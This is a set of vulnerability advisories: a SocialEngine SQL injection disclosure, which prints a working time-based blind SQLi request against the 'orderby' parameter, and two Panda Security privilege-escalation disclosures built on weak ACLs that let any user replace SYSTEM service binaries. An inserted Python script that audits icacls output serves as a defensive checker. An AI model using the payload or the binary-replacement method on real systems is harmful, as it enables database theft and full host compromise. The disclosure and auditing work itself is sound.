CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered an SQL injection vulnerability in SocialEngine, a popular social networking software package. The vulnerability can be exploited to gain access to potentially sensitive information in the database and compromise the entire website.
The vulnerability exists due to insufficient sanitization of input passed via the "orderby" HTTP GET parameter to the "/index.php" script. A remote unauthenticated attacker can modify the existing query and execute arbitrary SQL commands in the application's database.
The simple exploit below uses a time-based blind SQL injection technique to demonstrate the vulnerability. The following HTTP request delays the page response by 99 seconds if the first character of the MySQL version() string is "5" (i.e. a 5.x server). Decoded, the injected "orderby" value is 1 AND (SELECT * FROM (SELECT(SLEEP(IF(MID(version(),1,1) LIKE 5,99,0))))MTeU), a derived table that is evaluated only for its SLEEP() side effect:
http://[host]/blogs/?category=0&end_date=&orderby=1%20AND%20%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,99,0%29%29%29%29MTeU%29
-----------------------------------------------------------------------------------------------
Solution:
Update to SocialEngine 4.8.10
More Information:
http://blog.socialengine.com/2016/01/20/socialengine-php-4-8-10-is-released/
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23286 - https://www.htbridge.com/advisory/HTB23286 - SQL Injection in SocialEngine
[2] SocialEngine - http://www.socialengine.com/ - SocialEngine is PHP community software that helps you build your own custom social network website. Advanced social networking features include blogs, photo albums, user groups and forums, providing complete control over the layout and functionality of your social network, community, forum, or portal.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

platforms/windows/local/39670.txt

* CVE: CVE-2015-7378
* Vendor: Panda Security
* Reported by: Kyriakos Economou
* Date of Release: 05/04/2016
* Affected Products: Multiple
* Affected Version: Panda Security URL Filtering < v4.3.1.9
* Fixed Version: Panda Security URL Filtering v4.3.1.9
Description:
All Panda Security 2016 Home User products for Windows are vulnerable to privilege escalation, which allows a local attacker to execute code as SYSTEM from any account (Guest included), thus completely compromising the affected host.
Affected Products:
Panda Gold Protection 2016 v16.0.1
Panda Global Protection 2016 v16.0.1
Panda Internet Security 2016 v16.0.1
Panda Antivirus Pro 2016 v16.0.1
Panda Free Antivirus v16.0.1
Impact:
A local attacker can elevate his privileges from any user account and execute code as SYSTEM.
Technical Details:
By default all of the products listed above install the Panda Security URL Filtering component (current version 4.3.0.4), which creates a service named 'panda_url_filtering' that runs as SYSTEM.
The executable modules are by default installed in "C:\ProgramData\Panda Security URL Filtering" directory.
However, the ACLs assigned to the directory itself, and to the rest of the installed files, allow any user to modify those files and/or substitute them with malicious ones.
A local attacker can easily execute code with SYSTEM privileges by modifying or replacing the service's main executable module, 'Panda_URL_Filteringb.exe', which will be run the next time the service starts, e.g. at the next reboot of the host.
Disclosure Log:
Vendor Contacted: 28/09/2015
Public Disclosure: 05/04/2016
Copyright:
Copyright (c) Nettitude Limited 2016, All rights reserved worldwide.
Disclaimer:
The information herein contained may change without notice. Any use of this information is at the user's risk and discretion and is provided with no warranties. Nettitude and the author cannot be held liable for any impact resulting from the use of this information.
Kyriakos Economou
Vulnerability Researcher

platforms/windows/local/39671.txt

* CVE: CVE-2016-3943
* Vendor: Panda Security
* Reported by: Kyriakos Economou
* Date of Release: 05/04/2016
* Affected Products: Multiple
* Affected Version: Panda Endpoint Administration Agent < v7.50.00
* Fixed Version: Panda Endpoint Administration Agent v7.50.00
Description:
Panda Endpoint Administration Agent v7.30.2 allows a local attacker to elevate his privileges from any account type (Guest included) and execute code as SYSTEM, thus completely compromising the affected host.
Affected Products:
Any Panda Security For Business products for Windows using this Agent service are vulnerable.
Technical Details:
Upon installing some Panda Security for Business products for Windows, such as Panda Endpoint Protection/Plus, a service named 'Panda Endpoint Administration Agent' is installed on the host. This service runs under the SYSTEM account. However, due to weak ACLs set on the installation directory ("C:\Program Files\Panda Security\WaAgent") of this application and its subdirectories, any user can modify or overwrite any executable module (dynamic link libraries and executables) installed in those directories.
Impact:
A local attacker can elevate his privileges from any user account and execute code as SYSTEM.
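Both Nettitude advisories (the URL Filtering one above and this one) come down to the same defect: a SYSTEM service's binaries live in a directory whose ACL grants write-capable rights to principals every local account belongs to. The following audit is an added example, not Nettitude's or Panda's code. It parses `icacls` output for the two directories named in the advisories and flags allow ACEs that give Everyone, BUILTIN\Users, Authenticated Users or INTERACTIVE any right that lets them replace a file, while ignoring deny ACEs and read-only grants. The sample output is constructed to model the advisories' claims, not captured from a real install; the list of low-privileged principals and of write-capable right tokens is mine.

```python
import re
import subprocess

# Principals that every local account (Guest included) belongs to.
LOW_PRIV = {"everyone", r"builtin\users", r"nt authority\authenticated users",
            r"nt authority\interactive"}

# icacls right tokens that allow replacing or altering a file: full, modify,
# write, generic all/write, write/append data, delete (child), write DAC/owner.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "AD", "WA", "WEA", "D", "DC", "WDAC", "WO"}

# One ACE as icacls prints it: "<principal>:(flag)(flag)(rights)" at end of line.
# Principals may contain spaces ("NT AUTHORITY\SYSTEM"), so well-known multi-word
# authorities are listed explicitly and the account part may not contain '\'.
PRINCIPAL = (r"(?:NT AUTHORITY|NT SERVICE|CREATOR OWNER|APPLICATION PACKAGE AUTHORITY|[^\s\\:]+)"
             r"(?:\\[^\s:\\]+(?: [^\s:\\]+)*)?")
ACE_RE = re.compile(r"(?P<who>" + PRINCIPAL + r"):(?P<ace>(?:\([A-Za-z,]*\))+)\s*$")
FLAGS = {"I", "OI", "CI", "IO", "NP", "DENY"}   # inheritance flags, not rights


def ace_rights(ace):
    """'(DENY)(OI)(CI)(W)' -> (True, {'W'}); '(I)(OI)(CI)(RX)' -> (False, {'RX'})."""
    groups = re.findall(r"\(([^)]*)\)", ace)
    rights = {tok for g in groups for tok in g.split(",") if tok and tok not in FLAGS}
    return "DENY" in groups, rights


def weak_aces(icacls_output):
    """Return [(path, principal, sorted_rights)] for every allow ACE that gives a
    low-privileged principal a write-capable right. icacls prints the path and
    the first ACE on one line and the remaining ACEs indented below it."""
    findings, path = [], None
    for line in icacls_output.splitlines():
        if not line.strip() or line.startswith("Successfully processed"):
            continue
        m = ACE_RE.search(line)
        if not line[0].isspace():            # block header: "<path> <first ACE>"
            path = line[:m.start()].rstrip() if m else line.strip()
        if not m:
            continue
        deny, rights = ace_rights(m.group("ace"))
        granted = rights & WRITE_RIGHTS
        if not deny and granted and m.group("who").lower() in LOW_PRIV:
            findings.append((path, m.group("who"), sorted(granted)))
    return findings


def audit(paths):
    """Run icacls on each directory (Windows only) and report weak ACEs."""
    out = "".join(subprocess.run(["icacls", p], capture_output=True, text=True).stdout
                  for p in paths)
    return weak_aces(out)


# Constructed sample modelling the two advisories (not captured from a real
# install): one directory with Full control for Users, one with Modify for Users
# plus an explicit deny that must not count, and a hardened directory that
# grants Authenticated Users read/execute only.
SAMPLE_ICACLS = r"""C:\ProgramData\Panda Security URL Filtering BUILTIN\Users:(OI)(CI)(F)
                                            NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                                            BUILTIN\Administrators:(OI)(CI)(F)

C:\Program Files\Panda Security\WaAgent BUILTIN\Users:(OI)(CI)(M)
                                        Everyone:(DENY)(OI)(CI)(W)
                                        NT AUTHORITY\SYSTEM:(OI)(CI)(F)

C:\Program Files\Hardened Example NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)
                                  BUILTIN\Administrators:(I)(OI)(CI)(F)

Successfully processed 3 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for path, who, rights in weak_aces(SAMPLE_ICACLS):
        print(f"{path}: {who} has {','.join(rights)}")
```

On a live host, audit([r"C:\ProgramData\Panda Security URL Filtering", r"C:\Program Files\Panda Security\WaAgent"]) checks the two directories the advisories name; run it with `icacls <dir> /t` output instead if you also want the subdirectories and individual modules, since the second advisory says those inherit the weak ACL. Anything reported is a file a Guest-level user can swap for a binary that SYSTEM will execute at the next service start.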
Disclosure Log:
Vendor Contacted: 12/01/2016
Public Disclosure: 05/04/2016
Copyright:
Copyright (c) Nettitude Limited 2016, All rights reserved worldwide.
Disclaimer:
The information herein contained may change without notice. Any use of this information is at the user's risk and discretion and is provided with no warranties. Nettitude and the author cannot be held liable for any impact resulting from the use of this information.
Kyriakos Economou
Vulnerability Researcher